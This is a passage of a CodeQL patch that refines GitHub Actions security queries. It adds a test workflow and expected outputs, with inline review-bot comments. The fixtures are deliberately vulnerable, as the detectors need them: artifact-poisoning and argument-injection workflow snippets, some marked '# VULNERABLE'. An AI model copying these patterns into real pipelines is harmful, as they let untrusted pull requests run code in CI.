--format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD 
)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select From c5c3cd1726b135e24958f8c6f2b26b872850b4d8 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 11:47:35 +0200 Subject: [PATCH 588/707] Clean imports --- .../security/ArgumentInjectionQuery.qll | 1 - .../security/ArtifactPoisoningQuery.qll | 1 - .../actions/security/CachePoisoningQuery.qll | 2 -- .../codeql/actions/security/ControlChecks.qll | 3 +++ .../security/EnvPathInjectionQuery.qll | 23 ++++++++----------- .../actions/security/EnvVarInjectionQuery.qll | 3 --- .../security/OutputClobberingQuery.qll | 3 --- .../actions/security/PoisonableSteps.qll | 1 - .../security/SecretExfiltrationQuery.qll | 1 - .../actions/security/SelfHostedQuery.qll | 1 - .../UseOfKnownVulnerableActionQuery.qll | 1 - .../CompositeActionsSinks.ql | 0 .../CompositeActionsSources.ql | 0 .../CompositeActionsSummaries.ql | 0 .../ReusableWorkflowsSinks.ql | 0 .../ReusableWorkflowsSources.ql | 0 .../ReusableWorkflowsSummaries.ql | 0 .../Security/CWE-074/OutputClobberingHigh.ql | 1 + .../CWE-077/EnvPathInjectionCritical.ql | 1 + .../CWE-077/EnvPathInjectionMedium.ql | 1 + .../CWE-077/EnvVarInjectionCritical.ql | 1 + .../Security/CWE-077/EnvVarInjectionMedium.ql | 1 + .../Models/CompositeActionsSinks.qlref | 2 +- .../Models/CompositeActionsSources.qlref | 2 +- .../Models/CompositeActionsSummaries.qlref | 2 +- .../Models/ReusableWorkflowsSinks.qlref | 2 +- .../Models/ReusableWorkflowsSources.qlref | 2 +- .../Models/ReusableWorkflowsSummaries.qlref | 2 +- .../workflows/artifactpoisoning101.yml | 19 +++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 +++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 1 + 33 files changed, 52 insertions(+), 33 deletions(-) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSinks.ql (100%) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSources.ql (100%) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSummaries.ql (100%) rename ql/src/{Security/CWE-020 => 
Models}/ReusableWorkflowsSinks.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSources.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.ql (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index f7e4a9834452..1d461cca3df2 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -2,7 +2,6 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow abstract class ArgumentInjectionSink extends DataFlow::Node { diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d06b125ca322..9355462962d5 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -1,7 +1,6 @@ import actions private import codeql.actions.TaintTracking import codeql.actions.DataFlow -private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index a0113beed469..e5c5a3655101 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,6 +1,4 @@ import actions -import codeql.actions.config.Config -import codeql.actions.Helper string defaultBranchTriggerEvent() { result = 
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 86c7d989522b..3b15fc78d10a 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -253,6 +253,9 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { or this.getArgument("exit") = "true" ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%") } } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 859f625e068d..33efc9b1bc8f 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -3,20 +3,11 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class EnvPathInjectionSink extends DataFlow::Node { } /** * Holds if a Run step declares a PATH environment variable with contents from a local file. - * e.g. - * run: | - * cat foo.txt >> $GITHUB_PATH - * echo "$(cat foo.txt)" >> $GITHUB_PATH - * FOO=$(cat foo.txt) - * echo "$FOO" >> $GITHUB_PATH */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { 
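Review bot: The new `actions/github-script` disjunct treats any script whose text contains `getMembershipForUserInOrg` as an association check, but a substring match does not establish that the membership result gates the job — a script that merely logs membership, or mentions the API in a comment, satisfies it too, and if control checks are used to downgrade or suppress findings (as the `AssociationCheck` hierarchy suggests) that would hide real issues on the steps it is meant to protect. Consider also requiring a failure path in the same script, e.g. `this.getArgument("script").matches("%getMembershipForUserInOrg%") and this.getArgument("script").regexpMatch("(?s).*(core\\.setFailed|throw |process\\.exit).*")`, or at minimum record the assumption: `// Heuristic: a github-script step that queries org membership is assumed to fail the job for non-members`. The `splitAt("\n")` appears redundant for a `%…%` pattern that does not span lines and could be dropped. The enclosing `AssociationActionCheck` characteristic predicate starts before this hunk.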
@@ -28,11 +19,15 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( + // echo "$(cat foo.txt)" >> $GITHUB_PATH + // FOO=$(cat foo.txt) + // echo "$FOO" >> $GITHUB_PATH exists(string cmd | - run.getScript().getACmdReachingGitHubPathWrite(cmd) and - run.getScript().getAFileReadCommand() = cmd + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubPathWrite(cmd) ) or + // cat foo.txt >> $GITHUB_PATH run.getScript().fileToGitHubPath(_) ) ) @@ -91,8 +86,10 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run.getScript() and ( - run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) or - run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) or + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + or run.getScript().getAnEnvReachingGitHubPathWrite(var) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 13d6312b5856..99e9537a857d 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -3,9 +3,6 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index e959c7d60ca5..58b7b18ca62b 100644 
--- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -3,9 +3,6 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class OutputClobberingSink extends DataFlow::Node { } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 0cc8f9131667..5e62aa675eeb 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config abstract class PoisonableStep extends Step { } diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll index 0317ab281990..18a480b1cecc 100644 --- a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -2,7 +2,6 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources -private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow private class SecretExfiltrationSink extends DataFlow::Node { diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 419b2ac81a97..14d36ef0fa85 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config bindingset[runner] predicate isGithubHostedRunner(string runner) { 
diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll index bbb021fe3d55..920b8ab9d209 100644 --- a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll +++ b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config class KnownVulnerableAction extends UsesStep { string vulnerable_action; diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Models/CompositeActionsSinks.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSinks.ql rename to ql/src/Models/CompositeActionsSinks.ql diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Models/CompositeActionsSources.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSources.ql rename to ql/src/Models/CompositeActionsSources.ql diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Models/CompositeActionsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSummaries.ql rename to ql/src/Models/CompositeActionsSummaries.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Models/ReusableWorkflowsSinks.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql rename to ql/src/Models/ReusableWorkflowsSinks.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Models/ReusableWorkflowsSources.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSources.ql rename to ql/src/Models/ReusableWorkflowsSources.ql diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Models/ReusableWorkflowsSummaries.ql similarity index 100% rename from ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql rename to ql/src/Models/ReusableWorkflowsSummaries.ql 
diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index 2000e2100aef..9c9c2e4d139a 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.OutputClobberingQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import OutputClobberingFlow::PathGraph import codeql.actions.security.ControlChecks diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 54e013f1091d..7d8a3b490091 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph +import codeql.actions.dataflow.FlowSources import codeql.actions.security.ControlChecks from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index 7ca8f4a28382..a1499764ef36 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvPathInjectionQuery +import codeql.actions.dataflow.FlowSources import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index ad97dd3caefd..540edfd8b5f9 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql 
@@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import EnvVarInjectionFlow::PathGraph import codeql.actions.security.ControlChecks diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 70c05fc1c95d..c9af38a2c507 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink diff --git a/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/ql/test/query-tests/Models/CompositeActionsSinks.qlref index f8e1bfca630d..e5cb225ed249 100644 --- a/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1 +1 @@ -Security/CWE-020/CompositeActionsSinks.ql +Models/CompositeActionsSinks.ql diff --git a/ql/test/query-tests/Models/CompositeActionsSources.qlref b/ql/test/query-tests/Models/CompositeActionsSources.qlref index dce31c319238..3b833d669125 100644 --- a/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/CompositeActionsSources.ql +Models/CompositeActionsSources.ql diff --git a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index 007941cd2f5b..ea9b7a304e6b 100644 --- a/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/CompositeActionsSummaries.ql +Models/CompositeActionsSummaries.ql 
diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index 369befbce628..fa8344d4bf91 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSinks.ql +Models/ReusableWorkflowsSinks.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index cbea721ee343..fe4299bdba49 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSources.ql +Models/ReusableWorkflowsSources.ql diff --git a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index ff87d53c3d69..3547c8a4d07d 100644 --- a/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref @@ -1,2 +1,2 @@ -Security/CWE-020/ReusableWorkflowsSummaries.ql +Models/ReusableWorkflowsSummaries.ql diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml new file mode 100644 index 000000000000..7eaee9fa6d38 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -0,0 +1,19 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + - id: pr_number + run: | + PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT 
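Review bot: The fixture triggers on `pull_request_target` but feeds `${{github.event.workflow_run.workflow_id}}` and `${{github.event.workflow_run.id}}` to the download step; those payload fields exist only for `workflow_run` events, so as written the inputs would be empty at runtime. If the test intends to model the cross-workflow artifact pattern the trigger should be `workflow_run:`; if the mismatch is deliberate (checking that the sink is flagged regardless of the inputs), a comment such as `# event/inputs mismatch is intentional: only the download-then-execute shape matters here` would stop it reading as a typo.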
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 7a59ab6ec60d..5c784595dbec 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -13,6 +13,7 @@ edges | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -41,6 +42,8 @@ nodes | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -57,3 +60,4 @@ subpaths | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 2ed89bcb4bc5..e6108dddd2a5 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -13,6 +13,7 @@ edges | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -41,5 +42,7 @@ nodes | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 6d56b99407e0..d05c7bebc07e 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -3,6 +3,7 @@ | .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning101.yml:11:15:11:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 
'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 6a629764adc7..2a401dee18ae 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -53,6 +53,7 @@ edges | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | 